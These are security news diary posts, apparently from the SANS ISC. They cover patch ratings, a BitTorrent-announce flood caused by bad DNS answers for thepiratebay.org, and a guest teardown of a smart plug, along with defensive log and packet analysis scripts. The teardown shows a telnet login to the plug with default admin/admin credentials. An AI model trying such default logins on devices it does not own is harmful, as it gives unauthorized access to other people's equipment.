          CVE-2015-0015, KB 3014029
          Microsoft rating: Severity Important, Exploitability 3
          ISC rating: clients Important, servers Important

MS15-008  Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (Replaces MS08-007)
          Affected: Microsoft Windows
          CVE-2015-0011, KB 3019215
          Microsoft rating: Severity Important, Exploitability 2
          ISC rating: clients Important, servers Important

We will update issues on this page for about a week or so as they evolve. We appreciate updates.
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY.

(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems.
(**): The exploitability rating we show is the worst of them all due to the too large number of ratings Microsoft assigns to some of the patches.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


ISC StormCast for Tuesday, January 13th 2015 http://isc.sans.edu/podcastdetail.html?id=4309, (Tue, Jan 13th)

Mon, 01/12/2015 - 18:19

Are You Piratebay? thepiratebay.org Resolving to Various Hosts, (Mon, Jan 12th)

Mon, 01/12/2015 - 15:24

Thanks to our reader David for sending us this detect (anonymized):

GET announce?info_hash=....peer_id=....ip=....port=....uploaded=....downloaded=....*left=....numwant=.... HTTP/1.0
Host: a.tracker.thepriatebay.org
User-Agent: Bittorrent
Accept: */*
Connection: closed

David's web server was hit with a sufficient number of requests like the one above to cause a denial of service. The requests originated from thousands of different IP addresses, all of which appear to be located in China. A quick Google search revealed that he wasn't alone, but other web servers experienced similar attacks.

Given the host header (and David observed various thepriatebay.org host names), it looks like some DNS servers responded with David's IP address if queried for thepiratebay.org.

I did a quick check of passive DNS systems, and didn't find David's IP. But when I queried Chinese DNS servers for the host name, I received numerous answers. Each answer was only repeated a couple times, if at all. It sort of looked like they all returned different IP addresses. US based DNS servers on the other hand usually don't resolve the host name, or respond with 127.0.0.1, a typical blacklisting technique. Only a handful responded with a routable IP address.

Overall, I am not sure what is happening. Looks like a Chinese firewall issue to me. But if you have any ideas or packets, please let me know.
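Whatever the DNS-side cause, the server-side symptom is a flood of requests whose Host header names a site the server does not serve, and that is the handle for triage. The following is an added example (not David's logs or ISC code): over a few constructed log records of the form "source host-header request-line" it groups requests by unserved Host header and counts requests, distinct sources and tracker announces, which is what you need to decide between a cheap default-vhost rejection and source-based filtering. The served host names and all addresses are assumptions for the example.

```python
import re
from collections import defaultdict

# Names this server legitimately answers for (assumed for the example).
SERVED_HOSTS = {"www.example.com", "example.com"}

# Constructed log records (not David's logs): source_ip host_header "request_line"
SAMPLE_LOG = """\
203.0.113.10 a.tracker.thepriatebay.org "GET /announce?info_hash=aaaa&peer_id=bbbb HTTP/1.0"
203.0.113.11 a.tracker.thepriatebay.org "GET /announce?info_hash=cccc&peer_id=dddd HTTP/1.0"
203.0.113.12 b.tracker.thepriatebay.org "GET /announce?info_hash=eeee&peer_id=ffff HTTP/1.0"
198.51.100.5 www.example.com "GET /index.html HTTP/1.1"
203.0.113.10 a.tracker.thepriatebay.org "GET /announce?info_hash=aaaa&peer_id=bbbb HTTP/1.0"
198.51.100.6 example.com "GET /about.html HTTP/1.1"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) "([A-Z]+) (\S+) HTTP/[\d.]+"$')


def parse_line(line):
    """(source, host, method, target) or None for a line that does not fit the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, host, method, target = m.groups()
    return src, host.lower(), method, target


def stray_host_summary(log_text, served=SERVED_HOSTS):
    """Requests whose Host header names something this server does not serve.
    Returns {host: {"requests": n, "sources": distinct_ips, "announce": tracker_announces}}."""
    stats = defaultdict(lambda: {"requests": 0, "sources": set(), "announce": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        src, host, _method, target = rec
        if host in served:
            continue
        s = stats[host]
        s["requests"] += 1
        s["sources"].add(src)
        if target.startswith("/announce"):     # BitTorrent tracker announce, as in the detect above
            s["announce"] += 1
    return {h: {"requests": s["requests"], "sources": len(s["sources"]), "announce": s["announce"]}
            for h, s in stats.items()}


if __name__ == "__main__":
    for host, s in stray_host_summary(SAMPLE_LOG).items():
        print(f"{host}: {s['requests']} requests from {s['sources']} sources, {s['announce']} announces")
```

When the distinct-source count is in the thousands, as in David's case, blocking by address is hopeless and the right response is a default virtual host that answers unknown Host headers with a minimal 4xx before any application code runs; the announce count tells you the clients are BitTorrent peers that will simply move on when the tracker responds with an error.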

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


IoT: The Rise of the Machines (Guest Diary), (Mon, Jan 12th)

Mon, 01/12/2015 - 07:27

[This is a guest diary submitted by Xavier Mertens]

Our houses and offices are more and more infested by electronic devices embedding a real computer with an operating system and storage. They are connected to network resources for remote management, statistics or data polling. This is called the Internet of Things or IoT. My home network is hardened and any new (unknown) device connected to it receives an IP address from a specific range which has no connectivity with other hosts or the Internet but its packets are logged. The goal is to detect suspicious activity like data leaks or unexpected firmware updates. The last toy I bought yesterday is a Smart Plug from Supra-Electronics. This device allows you to control a power plug via your mobile device and calculate the energy consumption with nice stats. I had a very good opportunity to buy one for a very low price (25). Let's see what's inside....

The documentation mentions a setup procedure and management via a mobile device (with a free app for IOS or Android) but the first reflex is to scan the box. Interesting, a web server as well as a telnet server are waiting for packets. Let's try common credentials like admin/admin and...

$ telnet 192.168.254.225
Trying 192.168.254.225...
Connected to 192.168.254.225.
Escape character is ^].
(none) login: admin
Password:
BusyBox v1.12.1 (2014-07-31 06:32:52 CEST) built-in shell (ash)
Enter help for a list of built-in commands.
#

Immediately after the boot sequence, the device started to try to communicate with remote hosts:

Amongst DNS requests and NTP synchronization, a lot of traffic was generated to different IP addresses over UDP/10001, the same packet being sent to different hosts. The payload was a block of 60 bytes:

I was not able to decode the content of this payload, please comment if you recognize some patterns. The device also performs a regular connectivity check via a single ICMP ECHO packet sent to www.google.com (every 5 mins). This network traffic is generated by the process called RDTServer:

# ps
PID USER VSZ STAT COMMAND
1 admin 1400 S init
2 admin 0 SWN [ksoftirqd/0]
3 admin 0 SW [events/0]
4 admin 0 SW [khelper]
5 admin 0 SW [kthread]
6 admin 0 SW [kblockd/0]
7 admin 0 SW [kswapd0]
8 admin 0 SW [pdflush]
9 admin 0 SW [pdflush]
10 admin 0 SW [aio/0]
11 admin 0 SW [mtdblockd]
18 admin 1084 S nvram_daemon
19 admin 1612 S goahead
20 admin 872 R RDTServer
24 admin 1400 R telnetd
26 admin 872 S RDTServer
27 admin 872 S RDTServer
33 admin 872 S RDTServer
34 admin 872 S RDTServer
35 admin 872 S RDTServer
36 admin 872 S RDTServer
53 admin 1400 S /bin/sh
238 admin 0 SW [RtmpCmdQTask]
239 admin 0 SW [RtmpWscTask]
366 admin 1400 S -sh
505 admin 1400 R ps
678 admin 1400 S udhcpd /etc/udhcpd.conf
1116 admin 1396 S udhcpc -i apcli0 -s /sbin/udhcpc.sh -p /var/run/udhcp
1192 admin 872 S RDTServer
1207 admin 772 S ntpclient -s -c 0 -h ntp.belnet.be -i 86400
#

I grabbed a copy of the RDTServer binary (MIPS) and using the strings command against the file revealed interesting stuff. The IP addresses used were found in the binary:

IP               FQDN                  NetName                 Country
50.19.254.134    m1.iotcplatform.com   AMAZON-EC2-8            US
122.248.234.207  m2.iotcplatform.com   AMAZON-EC2-SG           Singapore
46.137.188.54    m3.iotcplatform.com   AMAZON-EU-AWS           Ireland
122.226.84.253                         JINHUA-MEIDIYA-LTD      China
61.188.37.216                          CHINANET-SC             China
220.181.111.147                        CHINANET-IDC-BJ         China
120.24.59.150    m4.iotcplatform.com   ALISOFT                 China
114.215.137.159  m5.iotcplatform.com   ALISOFT                 China
175.41.238.100                         AMAZON-AP-RESOURCES-JP  Japan


Seeing packets sent to China is often suspicious! The domain name iotcplatform.com belongs to ThroughTek, a company specialized in IoT and M2M (Machine to Machine) connection platforms:

Domain Name: IOTCPLATFORM.COM
Registry Domain ID: 1665166563_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Update Date: 2014-07-09T11:44:15Z
Creation Date: 2011-07-04T08:50:36Z
Registrar Registration Expiration Date: 2016-07-04T08:50:36Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.480-624-2505
Registry Registrant ID:
Registrant Name: Charles Kao
Registrant Organization:
Registrant Street: 4F., No.221, Chongyang Rd.,
Registrant City: Taipei
Registrant State/Province: Nangang District
Registrant Postal Code: 11573
Registrant Country: Taiwan
Registrant Phone: +886.886226535111
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: justin_yeh@tutk.com

In fact, the IOTC platform is a service developed by ThroughTek to establish P2P communications between devices. I read the documentation provided with the device as well as all the website pages and there is no mention of this service. Manufacturers should include some technical documentation about the network requirements (ex: to download firmware updates). In this case, it's not a major security issue but this story reinforces what we already know (and fear) about IoT: those devices have weak configuration and they lack visibility/documentation about their behavior. Take care when connecting them to your network. A best practice is to inspect the traffic they generate once online (DNS requests, HTTP(S) requests or any other protocol).
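The quarantine-and-log approach described at the top of this diary produces a packet list; the two questions to ask of it are "which destinations are not in the documentation?" and "is the device beaconing?". The script below is an added example (not Xavier's capture or ISC code): it runs over a constructed packet list modelled on the observations above, with DNS to the local resolver and NTP declared as expected, reports every other destination, and detects the rendezvous-beacon pattern of one identical payload sent to several hosts on one port, as the 60-byte UDP/10001 traffic was. The payload bytes and all addresses are invented for the example.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    dst: str
    proto: str
    dport: int
    payload: bytes


# Constructed packets from the quarantine range (not the diary's capture). The device's
# documented needs are DNS to the local resolver and NTP; everything else is suspect.
LOCAL_RESOLVER = "192.168.254.1"
EXPECTED = {("udp", 53), ("udp", 123)}
BEACON = bytes.fromhex("00000000" + "0102030405060708" * 7)   # 60-byte constructed payload
SAMPLE_CAPTURE = [
    Packet(LOCAL_RESOLVER, "udp", 53, b"\x12\x34\x01\x00"),
    Packet(LOCAL_RESOLVER, "udp", 123, b"\x1b" + b"\x00" * 47),
    Packet("198.51.100.1", "udp", 10001, BEACON),
    Packet("198.51.100.2", "udp", 10001, BEACON),
    Packet("203.0.113.3", "udp", 10001, BEACON),
    Packet("192.0.2.4", "udp", 10001, BEACON),
    Packet("192.0.2.4", "udp", 10001, BEACON),        # repeat to the same host, counted once
    Packet("192.0.2.200", "icmp", 0, b"\x08\x00"),    # the periodic connectivity ping
]


def unexpected_destinations(packets, expected=EXPECTED):
    """Every (dst, proto, dport) outside the documented set; the list to take to the vendor."""
    return sorted({(p.dst, p.proto, p.dport) for p in packets if (p.proto, p.dport) not in expected})


def find_beacons(packets, min_hosts=3, expected=EXPECTED):
    """Identical payload sent to at least min_hosts distinct destinations on one port: the
    signature of a discovery/rendezvous beacon such as the UDP/10001 traffic above.
    Returns {(proto, dport, payload_len): [destinations]}."""
    targets = defaultdict(set)
    for p in packets:
        if (p.proto, p.dport) in expected:
            continue
        targets[(p.proto, p.dport, p.payload)].add(p.dst)
    return {(proto, dport, len(payload)): sorted(dsts)
            for (proto, dport, payload), dsts in targets.items() if len(dsts) >= min_hosts}


if __name__ == "__main__":
    for dst, proto, port in unexpected_destinations(SAMPLE_CAPTURE):
        print(f"unexpected: {dst} {proto}/{port}")
    for (proto, port, size), dsts in find_beacons(SAMPLE_CAPTURE).items():
        print(f"beacon: {size}-byte {proto}/{port} payload to {len(dsts)} hosts: {', '.join(dsts)}")
```

Feeding real packets in is a matter of mapping your capture tool's records onto the Packet fields. Keying the beacon detector on the exact payload rather than on the port is what separates a P2P rendezvous from, say, a firmware check that also goes to several mirrors with different requests.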

--
If the enemy leaves a door open, you must rush in. - Sun Tzu
PGP Key: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x42D006FD51AD7F2C
